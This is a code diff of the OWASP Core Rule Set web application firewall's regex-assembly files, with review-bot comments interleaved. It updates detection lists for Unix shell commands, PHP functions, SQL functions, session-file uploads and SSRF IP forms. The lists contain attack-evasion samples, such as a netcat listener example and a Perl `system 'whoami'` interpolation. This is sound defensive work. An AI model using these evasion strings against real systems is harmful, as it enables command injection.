+##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b
+##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b
diff --git a/regex-assembly/932239.ra b/regex-assembly/932239.ra
index 67cdb604c8..a23e5d6c09 100644
--- a/regex-assembly/932239.ra
+++ b/regex-assembly/932239.ra
@@ -11,5 +11,5 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
-##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
-##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b
+##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b
diff --git a/regex-assembly/932260.ra b/regex-assembly/932260.ra
index a30aee5193..c4f1994a5e 100644
--- a/regex-assembly/932260.ra
+++ b/regex-assembly/932260.ra
@@ -11,5 +11,5 @@
 ##! These patterns are approximations of the patterns used by the cmdline
 ##! processor for `@` and `~`.
 ##! These patterns are used across multiple files, change with care.
- ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b
+ ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|),] ~ \S{1,10}\b
 ##!<
diff --git a/regex-assembly/932340.ra b/regex-assembly/932340.ra
new file mode 100644
index 0000000000..2a0deec01c
--- /dev/null
+++ b/regex-assembly/932340.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Block Unix commands being executed with no arguments
+##! This rule specifically only blocks commands that can be executed
+##! with no arguments to minimize the risk of false positives.
+
+##!+ i
+
+##!$ $
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+
+ ##! The `@` processor is not defined since we're matching the execution of commands with no arguments.
+ ##!> include-except unix-shell-noarguments unix-shell-noarguments-fps-pl1 -- ~ \S{1,10}\b
+##!<
diff --git a/regex-assembly/932350.ra b/regex-assembly/932350.ra
new file mode 100644
index 0000000000..a3cfdbbccd
--- /dev/null
+++ b/regex-assembly/932350.ra
@@ -0,0 +1,17 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! Block Unix commands being executed with no arguments
+##! This rule specifically only blocks commands that can be executed
+##! with no arguments to minimize the risk of false positives.
+
+##!+ i
+
+##!$ $
+
+##!> assemble
+ ##!> include unix-shell-evasion-prefix-start-of-string
+
+ ##! The `@` processor is not defined since we're matching the execution of commands with no arguments.
+ ##!> include unix-shell-noarguments -- ~ \S{1,10}\b
+##!<
diff --git a/regex-assembly/933160.ra b/regex-assembly/933160.ra
index e63c612e4b..9c8ab4d7ab 100644
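Review bot: 932350.ra is a copy of 932340.ra apart from the `include-except` versus `include` line, and both headers carry the same three-line description, so nothing in either file says which paranoia level it serves or why one of them omits the `unix-shell-noarguments-fps-pl1` exclusions. Inferring only from the exclusion name, 932340 is the lower-paranoia variant and 932350 the stricter one; each header should say so, e.g. in 932350 `##! Stricter variant of 932340: the PL1 false-positive exclusions are not applied here.` with the mirror sentence in 932340. The `##!$ $` anchor and the absence of a `@` processor are explained well by the inline comment; the missing piece is only the cross-reference between the two files.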
--- a/regex-assembly/933160.ra
+++ b/regex-assembly/933160.ra
@@ -41,6 +41,7 @@ md5
 mkdir
 opendir
 passthru
+phpinfo
 popen
 printf
 readfile
@@ -53,9 +54,11 @@ usort
 ##! English words, or potential snippets of them, are added here to perform a regex match.
 ##! Compared to the parallel match performed by 933150, fewer false positives will be generated.
 exp
+intval
 ord
 prev
 stat
 substr
 system
 unlink
+unserialize
diff --git a/regex-assembly/933220.ra b/regex-assembly/933220.ra
new file mode 100644
index 0000000000..6f2e036c27
--- /dev/null
+++ b/regex-assembly/933220.ra
@@ -0,0 +1,27 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! PHP Session File Access Detection
+##! This rule detects attempts to upload or create PHP session files, which can be used for PHP session deserialization attacks.
+##! Session files are stored with prefix "sess_" followed by the session ID.
+##!
+##! PHP session ID character sets (based on session.sid_bits_per_character):
+##! 4 bits: 0-9a-f (hex, legacy)
+##! 5 bits: 0-9a-v
+##! 6 bits: 0-9a-zA-Z,- (after t:lowercase becomes 0-9a-z,-)
+##!
+##! Session ID length: 22-256 characters (session.sid_length, default 32)
+##! Using 20 as minimum for some legacy/edge cases.
+##!
+##! References:
+##! - PHP session.save_handler documentation
+##! - https://www.php.net/manual/en/session.configuration.php
+
+##! Prefix: Match start of string OR path separator (Unix / or Windows \)
+##!^ (?:^|[/\x5c])
+
+##! Suffix: Match end of string
+##!$ $
+
+##! Main pattern: sess_ followed by valid session ID characters
+sess_[0-9a-z,-]{20,256}
diff --git a/regex-assembly/934120.ra b/regex-assembly/934120.ra
index 581122346e..4e3de189e5 100644
--- a/regex-assembly/934120.ra
+++ b/regex-assembly/934120.ra
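Review bot: The character class in `sess_[0-9a-z,-]{20,256}` in 933220.ra is lower-case only, and the header justifies that with `(after t:lowercase becomes 0-9a-z,-)`, so the regex is only correct if the rule that uses it applies `t:lowercase`; the `.ra` file itself does not set the `##!+ i` flag that the new 932340.ra and 932350.ra use. If the rule is ever written or copied without that transformation, a 6-bit session id containing upper-case letters is simply missed. Either add `##!+ i` so the assembled regex is safe on its own, or make the dependency explicit with `##! NOTE: relies on t:lowercase in the rule; the 6-bit character set contains A-Z.` above the pattern. The `{20,256}` lower bound is also explained only as "some legacy/edge cases" while the sentence above states 22 as the minimum; naming the case that needs 20 would stop the next maintainer from tightening it.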
@@ -11,13 +11,19 @@ ##!> assemble ##!> include url-schemes ##!=> - :// + ##! Per https://github.com/coreruleset/coreruleset/issues/4384, + ##! some malformed urls can be normalized by parsers, creating a bypass. + ##! Changed to have optional slashes. + :/?/? ##!=> ##! http://425.510.425.510/ Dotted decimal with overflow (already covered by RFI rule 931100) - ##! http://2852039166/ Dotless decimal - ##! http://7147006462/ Dotless decimal with overflow - \d{10} + ##! http://2852039166/ Dotless decimal (10 digits) + ##! http://7147006462/ Dotless decimal with overflow (10 digits) + ##! http://123456789/ Dotless decimal (9 digits) - converts to 7.91.205.21 + ##! Browsers accept any decimal that fits in 32-bit unsigned int (up to 4,294,967,295) + ##! Using 7-10 digits to catch most SSRF attempts while reducing false positives + \d{7,10} ##! http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal (?:0x[a-f0-9]{2}\.){3}0x[a-f0-9]{2} diff --git a/regex-assembly/934140.ra b/regex-assembly/934140.ra index 2451647b17..68a75bf426 100644 --- a/regex-assembly/934140.ra +++ b/regex-assembly/934140.ra 
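Review bot: The new `\d{7,10}` alternative in 934120.ra has no trailing boundary in the visible part of the assemble block, so any run of eleven or more digits following a scheme and `:/?/?` still matches on its first ten, which looks like a false-positive path for long numeric identifiers after a scheme. The assemble block continues outside the hunk; if a suffix marker or a later `##!=>` segment already supplies a boundary, a one-line comment saying so would settle it, and if nothing does, `\d{7,10}(?!\d)` pins the length the comment describes. The comment also says browsers accept values "up to 4,294,967,295" while the `7147006462` overflow example directly above is deliberately kept; rewording to "any 7-10 digit value, including overflowing ones" avoids the apparent contradiction.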
@@ -1,15 +1,7 @@ ##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regex_assembly/. -##! The text describes a performance issue with a simple regular expression "@{.*}" used for searching. The problem arises because the ".*" part matches any character zero or more times, which can lead to inefficient searching in some engines. +##! Find Perl string interpolation that tries to execute shell commands, e.g., `"...@{[system 'whoami']}...". +##! We simply look for the sequence `@{[`, taking into account potential white space. The pattern should be specific enough to avoid most FPs, while not causing issues with backtracking. -##! We want to reduce the possibility of impacting performance by removing the strings we can match before the one we are looking, "@{" -##! This regex avoids the double backtracking problem and ensures it finds the first "@{" efficiently. - -##! The prefix here to prevent backtracking is: -##! - something that is not an '@' -##! - or something that is an '@', but is not followed by '{' - -##!^ ^(?:[^@]|@[^{])* - -@+{[^}]*} +@+\{\s*\[ diff --git a/regex-assembly/942350.ra b/regex-assembly/942350.ra index 170fbd397e..cdb14b8c29 100644 --- a/regex-assembly/942350.ra +++ b/regex-assembly/942350.ra @@ -19,6 +19,7 @@ create\s+function\s.+\sreturns insert load rename + replace select truncate update diff --git a/regex-assembly/942410.ra b/regex-assembly/942410.ra index 751d6252f6..fad39837b5 100644 --- a/regex-assembly/942410.ra +++ b/regex-assembly/942410.ra 
@@ -1,246 +1,77 @@ ##! Please refer to the documentation at ##! https://coreruleset.org/docs/development/regex_assembly/. +##! This dataset in an extended version of regex-assembly/include/sql-injection-function-names.ra +##! It contains sequences with a high risk of false positives including regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra + ##!+ i ##!^ \b ##!$ \W*?\( abs acos -adddate -addtime -aes_decrypt -aes_encrypt -asin -ascii -asciistr -atan -atan2 avg -benchmark bin -bin_to_num -bit_and -bit_count -bit_length -bit_or -bit_xor cast char -character_length -char_length charset chr -ciel -cieling -coalesce -coercibility -compress -concat -concat_ws -connection_id -conv convert -convert_tz -cos -cot count -cr32 -curdate -current_date -current_time -current_timestamp -current_user -curtime -database date -date_add -datediff -date_format -date_sub day -dayname -dayofmonth -dayofweek -dayofyear -dcount -decode default degrees -des_decrypt -des_encrypt -dump elt -encode -encrypt -exp -export_set -extract -extractvalue field -field_in_set -find_in_set floor format -found_rows -from_base64 -from_days -from_unixtime -get_format -get_lock -greatest -group_concat -hex -hextoraw hour if -ifnull in -inet6_aton -inet6_ntoa -inet_aton -inet_ntoa -insert -instr -interval is -is_free_lock -is_ipv4 -is_ipv4_compat -is_ipv4_mapped -is_ipv6 -is_not -is_not_null -isnull -is_null -is_used_lock last -last_day -last_insert_id -lcase -least left length ln -load_file +likelihood local -localtimestamp -locate log -log10 -log2 lower -lpad -ltrim -makedate -make_set -master_pos_wait max -md5 -microsecond -mid min minute mod month -monthname -name_const -not_in now -nullif -oct -octet_length -old_password -ord password -period_add -period_diff -pg_sleep pi position -pow power -procedure_analyse quarter -quote -radians -rand -rawtohex rawtonhex rawtonhextoraw -release_lock repeat replace reverse right round -row_count -rpad -rtrim -schema second -sec_to_time -session_user 
-sha -sha1 -sha2 sign -sin sleep -soundex space -sqrt -std stddev -stddev_pop -stddev_samp -strcmp -str_to_date -subdate -substr -substring -substring_index -subtime sum -sysdate -system_user tan time -timediff -time_format -timestamp -timestampadd -timestampdiff -time_to_sec -to_base64 to_char to_days to_nchar to_seconds -trim -truncate -ucase -uncompress -uncompressed_length -unhex -unix_timestamp -updatexml +unlikely upper user -utc_date -utc_time -utc_timestamp -uuid -uuid_short values -variance -var_pop -var_samp version week -weekday -weekofyear -weight_string -xmltype year -yearweek diff --git a/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra index f5a352ea7f..5b3771d2d5 100644 --- a/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra +++ b/regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra @@ -4,6 +4,8 @@ ##! This list excludes command words that are prone to cause false positives ##! at paranoia level 1. +##! Additions to this list should also result in an addition to this one: regex-assembly/942410.ra + convert degrees elt diff --git a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra index 1494dc2860..0832b7c8a7 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra @@ -16,9 +16,6 @@ date date@ date~ -group -group@ -group~ more more@ more~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl1.ra b/regex-assembly/exclude/unix-shell-fps-pl1.ra index 1f7e6e0f16..a5521d87d2 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl1.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl1.ra 
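Review bot: The first new header line reads `##! This dataset in an extended version of regex-assembly/include/sql-injection-function-names.ra`; it should be `##! This dataset is an extended version of ...`. The second new line says the file contains high-FP sequences `including` the exclude file, which reads as a loose cross-reference rather than the rule the next hunk states (additions to the PL1 exclude list must also land here). Suggest `##! It also carries every word from regex-assembly/exclude/sql-injection-function-names-fps-pl1.ra; keep the two in sync.`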
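Review bot: The added comment `##! Additions to this list should also result in an addition to this one: regex-assembly/942410.ra` is ambiguous, since `this one` can be read as this same file. Suggest `##! Every word added to this list must also be added to regex-assembly/942410.ra.`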
@@ -64,10 +64,6 @@ ##! EOF ##! echo "${result}" | sort | uniq >> regex-assembly/exclude/unix-shell-fps-pl1.ra -##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735) -##! we've decided to exclude some commands for which only the exact match is an issue -##! (mostly for 933236). - GET GET@ GET~ @@ -352,9 +348,6 @@ go go@ go~ grc -group -group@ -group~ gtester hash hash@ @@ -521,9 +514,6 @@ npm@ nroff nsenter nslookup -null -null@ -null~ octave octave@ octave~ @@ -558,9 +548,6 @@ perms@ perms~ pf pf@ -pg -pg@ -pg~ php php@ php~ @@ -594,10 +581,6 @@ puppet puppet@ puppet~ pushd -##! excluded as part of PR #3735 -pwd -pwd@ -pwd~ python python@ python~ @@ -669,12 +652,6 @@ set~ sg sg@ sg~ -shadow -shadow@ -shadow~ -shells -shells@ -shells~ shuf shutdown shutdown@ @@ -727,10 +704,7 @@ taskset task~ tbl tclsh -tcp -tcp@ tcpdump -tcp~ tee tee@ tee~ @@ -745,10 +719,6 @@ time time@ time~ timedatectl -##! excluded as part of PR #3735 -timeout -timeout@ -timeout~ tmux top top@ @@ -761,10 +731,6 @@ tshark ul ul@ ulimit@ -##! excluded as part of PR #3735 -uname -uname@ -uname~ uncompress uncompress@ uncompress~ @@ -813,9 +779,6 @@ whiptail@ whiptail~ who who@ -whois -whois@ -whois~ who~ wireshark wish @@ -840,9 +803,6 @@ yes@ yes~ yum zathura -zero -zero@ -zero~ zip zip@ zip~ diff --git a/regex-assembly/exclude/unix-shell-fps-pl2.ra b/regex-assembly/exclude/unix-shell-fps-pl2.ra index fb1dde3d73..d55b11dd7e 100644 --- a/regex-assembly/exclude/unix-shell-fps-pl2.ra +++ b/regex-assembly/exclude/unix-shell-fps-pl2.ra 
@@ -11,152 +11,33 @@ ##! `awk@` to `awk~`, this list would not have to be updated. ##! See also unix-shell-fps-pl1.ra. -##! Note: As part of the effort to reduce FPs mid-term (https://github.com/coreruleset/coreruleset/pull/3735) -##! we've decided to exclude some commands for which only the exact match is an issure -##! (mostly for 933236). - aptitude aptitude@ aptitude~ -##! excluded as part of PR #3735 -cron -cron@ -cron~ -date -date@ -date~ -##! excluded as part of PR #3735 -dir -dir@ -dir~ dnf dnf@ dnf~ -##! excluded as part of PR #3735 -ed -ed@ -ed~ -##! excluded as part of PR #3735 -file -file@ -file~ -##! excluded as part of PR #3735 -GET -GET@ -GET~ -##! excluded as part of PR #3735 -hash -hash@ -hash~ -##! excluded as part of PR #3735 -HEAD -HEAD@ -HEAD~ -##! excluded as part of PR #3735 -id -id@ -id~ -##! excluded as part of PR #3735 -install -install@ -install~ -##! excluded as part of PR #3735 -java -java@ -java~ -##! excluded as part of PR #3735 -mail -mail@ -mail~ more more@ more~ -##! excluded as part of PR #3735 -null -null@ -null~ pacman pacman@ pacman~ ps ps@ ps~ -##! excluded as part of PR #3735 -pg -pg@ -pg~ -##! excluded as part of PR #3735 -php -php@ -php~ -##! excluded as part of PR #3735 -POST -POST@ -POST~ -##! excluded as part of PR #3735 -rename -rename@ -rename~ -##! excluded as part of PR #3735 -repeat -repeat@ -repeat~ -##! excluded as part of PR #3735 -screen -screen@ -screen~ -##! excluded as part of PR #3735 -sort -sort@ -sort~ -##! excluded as part of PR #3735 -ss -ss@ -ss~ -##! excluded as part of PR #3735 -source -source@ -source~ -##! excluded as part of PR #3735 -task -task@ -task~ time time@ time~ -##! excluded as part of PR #3735 -timeout -timeout@ -timeout~ -##! excluded as part of PR #3735 -uname -uname@ -uname~ up2date up2date@ up2date~ vi vi@ vi~ -##! excluded as part of PR #3735 -wall -wall@ -wall~ -##! excluded as part of PR #3735 -view -view@ -view~ who who@ who~ -##! 
excluded as part of PR #3735 -whois -whois@ -whois~ w w@ w~ -##! excluded as part of PR #3735 -yes -yes@ -yes~ diff --git a/regex-assembly/exclude/unix-shell-fps-useragents.ra b/regex-assembly/exclude/unix-shell-fps-useragents.ra index 9cbd3f5541..0855584fb8 100644 --- a/regex-assembly/exclude/unix-shell-fps-useragents.ra +++ b/regex-assembly/exclude/unix-shell-fps-useragents.ra @@ -16,10 +16,6 @@ ##! `curl@` to `curl~`, this list would not have to be updated. ##! See also unix-shell-fps-pl1.ra. -# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0 -cpan -cpan@ -cpan~ # curl (https://curl.se): curl/8.1.2 curl curl@ diff --git a/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra b/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra new file mode 100644 index 0000000000..a3cbc6807f --- /dev/null +++ b/regex-assembly/exclude/unix-shell-noarguments-fps-pl1.ra @@ -0,0 +1,13 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes the execution of command with no arguments at PL-1 +##! that are prone to false positives. + +dir +history +id +pwd +screen +top +uname diff --git a/regex-assembly/include/unix-shell-4andup.ra b/regex-assembly/include/unix-shell-4andup.ra index b7c67413b3..ab77df1308 100644 --- a/regex-assembly/include/unix-shell-4andup.ra +++ b/regex-assembly/include/unix-shell-4andup.ra 
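Review bot: The new file's header, `##! This list excludes the execution of command with no arguments at PL-1`, has a grammar slip (`commands`) and does not say which include list the exclusion is applied against. The names suggest it pairs with regex-assembly/include/unix-shell-noarguments.ra, also new in this diff, where all seven entries appear; if that is right, say so: `##! This list excludes commands from regex-assembly/include/unix-shell-noarguments.ra that are prone to false positives at PL1 when executed with no arguments.` A reader also cannot tell from either file whether an entry here is dropped from the PL1 pattern or only re-scored, so one sentence on the effect would help.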
@@ -8,10 +8,10 @@ ##! To regenerate this list from unix-shell.data, run the following: ##! NL=$'\n' ##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" -##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ -##! rules/unix-{shell,shell-builtins}.data | \ +##! # Exclude entries starting with `(dev/|etc/|proc/|#)` and empty lines, they are not commands +##! source="$(grep -vEh '^(dev/|etc/|proc/|#|$)' rules/unix-{shell,shell-builtins}.data | \ +##! awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' | \ ##! sort | uniq)" -##! result="" ##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes ##! while read -r oword; do ##! # strip suffixes from end of words @@ -52,9 +52,10 @@ ##! # Suffix all English words or words shorter than 5 characters with `@` ##! original="${result}" +##! tmpfile="$(mktemp)" ##! wget https://raw.githubusercontent.com/coreruleset/coreruleset/refs/tags/v4.0.0/util/fp-finder/english-extended.txt -##! english="$(crs-toolchain util fp-finder -e english-extended.txt - <<<"${result}")" -##! rm -f english-extended.txt +##! english="$(crs-toolchain util fp-finder "$tmpfile" -e english-extended.txt <<<"${result}")" +##! rm -f "$tmpfile" english-extended.txt ##! result="" ##! while read -r oword; do ##! found=0 @@ -253,7 +254,6 @@ gimp@ ginsh@ grcat@ grep@ -group@ groupmod gtester gunzip @@ -346,7 +346,6 @@ mail@ mailq@ mailx@ make@ -master\.passwd mawk@ mkdir@ mkfifo @@ -389,7 +388,6 @@ nroff@ nsenter nslookup nstat@ -null@ octave@ onintr openssl @@ -437,7 +435,6 @@ ptardiff ptargrep puppet@ pushd@ -pwd\.db py3versions python2 python3 @@ -487,8 +484,6 @@ setfacl@ setsid sftp@ sh\.distrib -shadow@ -shells@ shuf@ shutdown@ sleep@ @@ -500,7 +495,6 @@ soelim sort@ source@ split@ -spwd\.db sqlite3 ssh-add ssh-agent @@ -510,9 +504,6 @@ ssh-keyscan sshpass start-stop-daemon stdbuf -stderr -stdin@ -stdout strace strings@ sudo-rs 
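Review bot: Removing `##! result=""` from the regeneration recipe leaves `result` uninitialised before the `while read -r oword` loop; if that loop appends to `${result}` (its body runs past the hunk), a value left over from an earlier run in the same shell would be carried into the new list. Keeping the initialisation costs nothing, or the recipe should say it is meant to run in a fresh shell.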
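Review bot: The new `crs-toolchain util fp-finder "$tmpfile" -e english-extended.txt <<<"${result}"` passes a freshly created, empty file as the positional argument while still feeding `${result}` on stdin, where the old line used `-` for stdin. Which of the two the tool reads is not visible here: if it reads the file, `english` comes back empty and no word gets the `@` suffix; if it reads stdin, the `mktemp`/`rm` pair is dead weight. Either write the list into the file first (`printf '%s\n' "${result}" > "$tmpfile"`) and drop the here-string, or keep `-`; confirm against the fp-finder usage of the pinned toolchain.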
@@ -552,6 +543,7 @@ tmux@ touch@ traceroute traceroute6 +trap@ troff@ tshark ulimit@ @@ -616,7 +608,6 @@ zcat@ zcmp@ zdiff@ zegrep -zero@ zfgrep zgrep@ zipcloak diff --git a/regex-assembly/include/unix-shell-noarguments.ra b/regex-assembly/include/unix-shell-noarguments.ra new file mode 100644 index 0000000000..0bb21c8672 --- /dev/null +++ b/regex-assembly/include/unix-shell-noarguments.ra @@ -0,0 +1,34 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list contains a curated set of commands that can be meaningfully executed with no arguments. + +aptitude +df +dir +dmesg +env +history +hostname +htop +id +iostat +last +ls +mysql +mysql~ +ps +psql +pwd +reboot +screen +set +shutdown +su +top +uname +vmstat +w +who +whoami +whois diff --git a/regex-assembly/include/unix-shell-upto3.ra b/regex-assembly/include/unix-shell-upto3.ra index 3343c82b84..8a04b4032e 100644 --- a/regex-assembly/include/unix-shell-upto3.ra +++ b/regex-assembly/include/unix-shell-upto3.ra @@ -6,8 +6,9 @@ ##! NL=$'\n' ##! # select words of length <= 3 ##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" -##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ -##! rules/unix-{shell,shell-builtins}.data | \ +##! # Exclude entries starting with `(dev/|etc/|proc/|#)` and empty lines, they are not commands +##! source=$(grep -vEh '^(dev/|etc/|proc/|#|$)' rules/unix-{shell,shell-builtins}.data | \ +##! awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' | \ ##! sort | uniq) ##! result="" ##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes @@ -102,7 +103,6 @@ es@ esh@ ex@ fc@ -fd@ fg@ fi@ fmt@ @@ -146,8 +146,8 @@ pf@ pg@ php@ pic@ -pip~ pip@ +pip~ pkg@ pr@ pry@ @@ -175,12 +175,10 @@ svn@ tac@ tar@ tbl@ -tcp@ tee@ tex@ tic@ top@ -udp@ ul@ vi@ vim@ 
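Review bot: The new include list carries `mysql~` next to `mysql` without explaining the `~` suffix, and its header only says the set is curated; the sibling lists in this diff refer to their `@`/`~` suffixes in their headers (the `awk@` to `awk~` remark in unix-shell-fps-pl2.ra). Add a header line stating what `~` means for this list, or point at the file where the suffix convention is defined. Several entries (`set`, `env`, `last`, `who`, `w`, `ls`, `su`) are ordinary words or very short tokens that stay at PL1, since the new PL1 exclude file only removes `dir`, `history`, `id`, `pwd`, `screen`, `top`, `uname`; a sentence on what the consuming pattern requires around a bare word would let a reader judge the false-positive exposure.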
diff --git a/regex-assembly/toolchain.yaml b/regex-assembly/toolchain.yaml index 70dc47bd05..c3129af2fe 100644 --- a/regex-assembly/toolchain.yaml +++ b/regex-assembly/toolchain.yaml @@ -20,7 +20,7 @@ patterns: # - &|: logical operators in headers, e.g., `a=nc&&$a -nlvp 555` # - ): subshell, e.g, `(ifconfig)` unix: | - (?:[\s<>&|),]|$).* + [\s<>&|),].* # "more foo", "more,foo", "more;foo", "more.com", "more/e", # "morefoo" windows: | @@ -41,11 +41,11 @@ patterns: # It will _not_ match: # python foo # - # (?:[<>&|),]|$){1,10}: anti-evasion suffix without space, limited to 10 matches + # [<>&|),]{1,10}: anti-evasion suffix without space, limited to 10 matches # (?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}: non-whitespace followed by anti-evasion pattern, limited to 10 matches - # (?:[\s<>&|),}]|$){1,10}): anti-evasion suffix, including `}` (to match command names within expansions, e.g. `${gcc7.4}gcc7.4`), limited to 10 matches + # [\s<>&|),}]{1,10}): anti-evasion suffix, including `}` (to match command names within expansions, e.g. `${gcc7.4}gcc7.4`), limited to 10 matches unix: | - (?:(?:[<>&|),]|$){1,10}|(?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}(?:[\s<>&|),}]|$){1,10}) + (?:[<>&|),]{1,10}|(?:[\w\d._-][\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c?){1,10}[\s<>&|),}]{1,10}) # This will match: # # python,foo diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example index ceadfa223f..c474aa79d1 100644 --- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example +++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # 
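Review bot: Dropping `|$` from the `unix` suffix pattern means a command name at the very end of the inspected value no longer matches through this suffix, but the comment block above it (`# - ): subshell, e.g, `(ifconfig)``) still only lists the accepted characters and does not say that end-of-input is now deliberately excluded; the same applies to the rewritten comment lines in the second hunk of this file. Add a line such as `# End of input is intentionally not accepted here; commands with no argument are handled by the unix-shell-noarguments lists` — the pairing with the new regex-assembly/include/unix-shell-noarguments.ra is inferred from this diff, so confirm it before wording it that way.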
diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf index 4b0e2ebb9b..d65e423edd 100644 --- a/rules/REQUEST-901-INITIALIZATION.conf +++ b/rules/REQUEST-901-INITIALIZATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -26,7 +26,7 @@ # # Ref: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature # -SecComponentSignature "OWASP_CRS/4.22.0" +SecComponentSignature "OWASP_CRS/4.23.0" # # -=[ Default setup values ]=- @@ -60,7 +60,7 @@ SecRule &TX:crs_setup_version "@eq 0" \ auditlog,\ msg:'CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL'" @@ -79,7 +79,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.inbound_anomaly_score_threshold=5'" # Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf) @@ -89,7 +89,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.outbound_anomaly_score_threshold=4'" # Default Reporting Level (rule 900115 in crs-setup.conf) @@ -99,7 +99,7 @@ SecRule &TX:reporting_level "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.reporting_level=4'" # Default Early Blocking (rule 900120 in crs-setup.conf) 
